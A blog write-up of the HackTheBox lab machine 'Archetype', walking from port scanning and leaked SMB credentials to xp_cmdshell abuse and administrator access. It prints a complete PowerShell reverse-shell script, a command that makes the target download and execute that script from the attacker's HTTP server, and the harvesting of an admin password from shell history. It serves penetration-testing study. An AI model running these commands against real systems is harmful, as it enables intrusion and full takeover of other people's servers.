HTB from Zero to Giving Up: Archetype

Vulnerability reproduction · hackthebox · January 15, 2021

Environment setup

First, install and configure OpenVPN on Kali:

sudo apt-get update
sudo apt-get install network-manager-openvpn-gnome \
network-manager-pptp network-manager-pptp-gnome \
network-manager-strongswan network-manager-vpnc \
network-manager-vpnc-gnome -y

Then download the OpenVPN configuration file and connect with it:

sudo openvpn example.ovpn

One pitfall here: remember to set the machine's time zone correctly. After connecting with the configuration file HackTheBox provides, check the local IP addresses; there should now be an extra network interface.

Next, scan the ports:

ports=$(sudo nmap -p- --min-rate=1000 -T4 10.10.10.27 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
sudo nmap -sC -sV -p$ports 10.10.10.27

What I actually used was:

sudo nmap -sC -sV -T4 10.10.10.27

Ports 445 and 1433 are open, so try an SMB connection:

smbclient -N -L \\\\10.10.10.27\\

There is a share called backups; let's see what is inside:

smbclient -N \\\\10.10.10.27\\backups

The configuration file in that share contains an account name and password.

Next, connect with impacket's mssqlclient.py:

python3 mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth

Next, check whether the current user is a member of the sysadmin server role:

select IS_SRVROLEMEMBER('sysadmin')

With that we can call xp_cmdshell, but it has to be enabled first:

EXEC sp_configure 'Show Advanced Options', 1;
reconfigure;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1;
reconfigure;
xp_cmdshell "whoami"

It turns out to be a low-privileged user, so next comes information gathering:

xp_cmdshell "systeminfo"

The output is as follows:

Host Name:                 ARCHETYPE                                               
OS Name:                   Microsoft Windows Server 2019 Standard                  
OS Version:                10.0.17763 N/A Build 17763                              
OS Manufacturer:           Microsoft Corporation                                   
OS Configuration:          Standalone Server                                       
OS Build Type:             Multiprocessor Free                                     
Registered Owner:          Windows User                                            
Registered Organization:                                                           
Product ID:                00429-00521-62775-AA442                                 
Original Install Date:     1/19/2020, 10:39:36 PM                                  
System Boot Time:          1/12/2021, 3:29:32 PM                                   
System Manufacturer:       VMware, Inc.                                            
System Model:              VMware7,1                                               
System Type:               x64-based PC                                            
Processor(s):              1 Processor(s) Installed.                               
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz   
BIOS Version:              VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019   
Windows Directory:         C:\Windows                                              
System Directory:          C:\Windows\system32                                     
Boot Device:               \Device\HarddiskVolume2                                 
System Locale:             en-us;English (United States)                           
Input Locale:              en-us;English (United States)                           
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)                  
Total Physical Memory:     2,047 MB                                                
Available Physical Memory: 289 MB                                                  
Virtual Memory: Max Size:  2,691 MB                                                
Virtual Memory: Available: 661 MB                                                  
Virtual Memory: In Use:    2,030 MB                                                
Page File Location(s):     C:\pagefile.sys                                         
Domain:                    WORKGROUP                                               
Logon Server:              N/A                                                     
Hotfix(s):                 2 Hotfix(s) Installed.                                  
                           [01]: KB4532947                                         
                           [02]: KB4464455                                         
Network Card(s):           1 NIC(s) Installed.                                     
                           [01]: vmxnet3 Ethernet Adapter                          
                                 Connection Name: Ethernet0 2                      
                                 DHCP Enabled:    No                               
                                 IP address(es)                                    
                                 [01]: 10.10.10.27                                 
                                 [02]: fe80::e87a:ab8a:fca0:90e6                   
                                 [03]: dead:beef::e87a:ab8a:fca0:90e6              

Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.   

List the users:

xp_cmdshell "net user"

List the open ports:

xp_cmdshell "netstat -ano"

The output is as follows:

  Proto  Local Address          Foreign Address        State           PID         
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       828         
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4           
  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING       1548        
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4           
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4           
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       452         
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       928         
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       988         
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       584         
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       1132        
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       596         
  TCP    10.10.10.27:135        10.10.14.97:58472      ESTABLISHED     828         
  TCP    10.10.10.27:139        0.0.0.0:0              LISTENING       4           
  TCP    10.10.10.27:1433       10.10.14.60:36584      TIME_WAIT       0           
  TCP    10.10.10.27:1433       10.10.14.107:44280     ESTABLISHED     1548        
  TCP    10.10.10.27:1433       10.10.14.108:48248     ESTABLISHED     1548        
  TCP    10.10.10.27:49664      10.10.14.97:38916      ESTABLISHED     452         
  TCP    10.10.10.27:49665      10.10.14.97:43884      ESTABLISHED     928         
  TCP    10.10.10.27:49666      10.10.14.97:54500      ESTABLISHED     988         
  TCP    10.10.10.27:49667      10.10.14.97:40818      ESTABLISHED     584         
  TCP    10.10.10.27:49668      10.10.14.97:36848      ESTABLISHED     1132        
  TCP    10.10.10.27:49669      10.10.14.97:57702      ESTABLISHED     596         
  TCP    10.10.10.27:49690      10.10.14.89:443        ESTABLISHED     3616        
  TCP    10.10.10.27:49736      10.10.14.3:443         ESTABLISHED     1716        
  TCP    10.10.10.27:49738      10.10.14.53:443        ESTABLISHED     3592        
  TCP    10.10.10.27:49789      10.10.14.4:1234        ESTABLISHED     1344        
  TCP    10.10.10.27:49791      10.10.14.4:1234        ESTABLISHED     2184        
  TCP    10.10.10.27:49817      10.10.14.54:443        ESTABLISHED     1100        
  TCP    10.10.10.27:49825      10.10.14.85:443        ESTABLISHED     3572        
  TCP    10.10.10.27:49851      10.10.14.88:443        ESTABLISHED     3484        
  TCP    127.0.0.1:1434         0.0.0.0:0              LISTENING       1548        
  TCP    [::]:135               [::]:0                 LISTENING       828         
  TCP    [::]:445               [::]:0                 LISTENING       4           
  TCP    [::]:1433              [::]:0                 LISTENING       1548        
  TCP    [::]:5985              [::]:0                 LISTENING       4           
  TCP    [::]:47001             [::]:0                 LISTENING       4           
  TCP    [::]:49664             [::]:0                 LISTENING       452         
  TCP    [::]:49665             [::]:0                 LISTENING       928         
  TCP    [::]:49666             [::]:0                 LISTENING       988         
  TCP    [::]:49667             [::]:0                 LISTENING       584         
  TCP    [::]:49668             [::]:0                 LISTENING       1132        
  TCP    [::]:49669             [::]:0                 LISTENING       596         
  TCP    [::1]:1434             [::]:0                 LISTENING       1548        
  UDP    0.0.0.0:123            *:*                                    1464        
  UDP    0.0.0.0:500            *:*                                    988         
  UDP    0.0.0.0:4500           *:*                                    988         
  UDP    0.0.0.0:5353           *:*                                    612         
  UDP    0.0.0.0:5355           *:*                                    612         
  UDP    10.10.10.27:137        *:*                                    4           
  UDP    10.10.10.27:138        *:*                                    4           
  UDP    127.0.0.1:53076        *:*                                    988         
  UDP    [::]:123               *:*                                    1464        
  UDP    [::]:500               *:*                                    988         
  UDP    [::]:4500              *:*                                    988         
  UDP    [::]:5353              *:*                                    612         
  UDP    [::]:5355              *:*                                    612   

Next, find a way to get a reverse shell back. The official walkthrough uses the following script:

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.3",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() 

Note: replace the IP with your own machine's IP.

After changing the IP, save it as shell.ps1, then start an HTTP server with Python:

python3 -m http.server 80 

Then listen on port 443 with nc:

sudo nc -lvvp 443

Next, make the target download and execute our shell.ps1:

xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.108/shell.ps1\");"

We have received the reverse shell.

Next, check the PowerShell command history:

type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt 

It contains the administrator's password; next, log in with psexec.py:

python3 psexec.py administrator@10.10.10.27

At this point we have administrator privileges:

whoami

The flag on the desktop is ours.


© 2021 Echocipher. Using Typecho & Moricolor.